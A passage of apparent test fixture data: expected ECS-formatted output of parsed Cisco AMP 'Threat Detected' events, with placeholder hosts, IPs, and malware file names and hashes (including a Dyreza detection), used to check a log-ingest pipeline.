Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533668103677542000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533668103677542427", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:14:55.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": 
"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "user": { + "name": "user@testdomain.com" + }, + "hostname": "Demo_AMP_Threat_Audit" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581784321Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":112000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533668103677542000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533668103677542426", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:14:55.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "\\\\?\\C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": 
"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "hostname": "Demo_AMP_Threat_Audit", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581786193Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":71000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542425\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533668103677542000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533668103677542425", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:13:54.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "\\\\?\\C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": 
"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "hostname": "Demo_AMP_Threat_Audit", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581788054Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":532000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533667841684537000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533667841684537367", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:13:54.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": 
"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "user": { + "name": "user@testdomain.com" + }, + "hostname": "Demo_AMP_Threat_Audit" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581790080Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":454000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667841684537366\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533667841684537000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.DFC.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533667841684537366", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:13:54.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "\\\\?\\C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": 
"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "hostname": "Demo_AMP_Threat_Audit", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581791973Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":80000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537365\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533667841684537000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533667841684537365", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:13:53.000Z", + "file": { + "name": "webinstall.exe", + "path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "hash": { + "sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "sha256": 
"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "md5": "e9d8c15e7d18678dd41771f72ed6693c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Dyre" + ], + "hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Dyre", + "hostname": "Demo_Dyre" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581793892Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258118058508000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258118058508361\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6176258118058508000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "GenericKD:Dyreza-tpd", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "23:d5:92:eb:f8:9b", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "23:d5:92:eb:f8:9b" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6176258118058508361", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:13:53.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": 
"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "user": { + "name": "user@testdomain.com" + }, + "hostname": "Demo_AMP_Threat_Audit" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581795768Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667837389570000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":689000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667837389570068\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533667837389570000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533667837389570068", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:13:41.000Z", + "file": { + "name": "webinstall.exe", + "path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "hash": { + "sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "sha256": 
"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "md5": "e9d8c15e7d18678dd41771f72ed6693c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Dyre" + ], + "hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Dyre", + "hostname": "Demo_Dyre" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581797669Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258066518901000,\"timestamp\":1610705621,\"timestamp_nanoseconds\":608000000,\"date\":\"2021-01-15T10:13:41+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258066518900808\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6176258066518901000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "GenericKD:Dyreza-tpd", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "23:d5:92:eb:f8:9b", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "23:d5:92:eb:f8:9b" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6176258066518900808", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:13:29.000Z", + "file": { + "name": "webinstall.exe", + "path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "hash": { + "sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "sha256": 
